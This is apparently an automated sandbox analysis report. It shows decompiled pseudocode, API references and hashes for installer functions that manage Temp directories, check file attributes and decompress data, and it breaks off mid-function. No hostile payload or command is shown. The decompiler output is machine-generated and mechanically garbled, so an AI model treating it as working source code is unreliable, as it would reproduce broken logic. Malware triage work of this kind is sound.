				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsz97CF.tmp\\", 7); // executed
				return _t4;
			}







                                                                                              0x00403c25
                                                                                              0x00403c34
                                                                                              0x00403c37
                                                                                              0x00403c39
                                                                                              0x00403c39
                                                                                              0x00403c40
                                                                                              0x00403c48
                                                                                              0x00403c4b
                                                                                              0x00403c4d
                                                                                              0x00403c4d
                                                                                              0x00403c4d
                                                                                              0x00403c54
                                                                                              0x00403c60
                                                                                              0x00403c66

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\, xrefs: 00403C5B
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz97CF.tmp\
                                                                                              • API String ID: 2962429428-1768088699
                                                                                              • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                              • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                              • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                              • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 643 401663-4022f6 call 401423 641->643 644 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->644 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 643->660 661 40292e-402935 643->661 644->660 663 40165b-40165e 644->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c33 650->653 653->649 667 4015fa-4015fd call 405b99 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                                                                              C-Code - Quality: 86%
                                                                                              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                              0x004015c1
                                                                                              0x004015c9
                                                                                              0x004015cc
                                                                                              0x004015d1
                                                                                              0x004015d5
                                                                                              0x004015d7
                                                                                              0x004015df
                                                                                              0x004015e1
                                                                                              0x004015e4
                                                                                              0x004015ea
                                                                                              0x00401604
                                                                                              0x00401607
                                                                                              0x004015ec
                                                                                              0x004015ec
                                                                                              0x004015ef
                                                                                              0x00000000
                                                                                              0x004015fa
                                                                                              0x004015fd
                                                                                              0x004015fd
                                                                                              0x004015ef
                                                                                              0x0040160e
                                                                                              0x00401615
                                                                                              0x00401624
                                                                                              0x00401624
                                                                                              0x00401617
                                                                                              0x0040161a
                                                                                              0x00401622
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401622
                                                                                              0x00401615
                                                                                              0x00401627
                                                                                              0x0040162b
                                                                                              0x0040162c
                                                                                              0x004015d7
                                                                                              0x00401634
                                                                                              0x00401663
                                                                                              0x004022f1
                                                                                              0x00401636
                                                                                              0x00401638
                                                                                              0x00401645
                                                                                              0x0040164d
                                                                                              0x00401655
                                                                                              0x0040165b
                                                                                              0x0040165b
                                                                                              0x00401655
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 1892508949-501415292
                                                                                              • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                              • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                              • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                              • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                                                              C-Code - Quality: 53%
                                                                                              			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                              0x0040604b
                                                                                              0x00406056
                                                                                              0x0040605a
                                                                                              0x00406061
                                                                                              0x0040606d
                                                                                              0x0040607d
                                                                                              0x0040607f
                                                                                              0x00406097
                                                                                              0x00406098
                                                                                              0x0040609f
                                                                                              0x004060a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406083
                                                                                              0x0040608a
                                                                                              0x00406092
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040608a
                                                                                              0x004060a2
                                                                                              0x004060a8
                                                                                              0x00000000
                                                                                              0x004060b6
                                                                                              0x0040606f
                                                                                              0x00406075
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406075
                                                                                              0x0040605c
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                                                                                              • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: P_B
                                                                                              • API String ID: 3248276644-906794629
                                                                                              • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                              • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                              • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                              • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 711 407447-40744d 705->711 709 4074f0-407505 706->709 710 407507-40751a 706->710 707->711 712 407426-40743e 708->712 713 4075cf-4075d9 708->713 714 40751d-407524 709->714 710->714 716 406bf2 711->716 717 4075fa 711->717 712->707 718 4075e5-4075f8 713->718 719 4074c4 714->719 720 407526 714->720 721 406bf9-406bfd 716->721 722 406d39-406d5a 716->722 723 406c9e-406ca2 716->723 724 406d0e-406d12 716->724 726 4075fd-407601 717->726 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->718 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->718 729->717 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->718 736 406cc4-406cc8 732->736 733->718 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->717 748 406c81 743->748 744->736 745->744 745->745 746->717 746->741 747->746 748->737
                                                                                              C-Code - Quality: 99%
                                                                                              			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
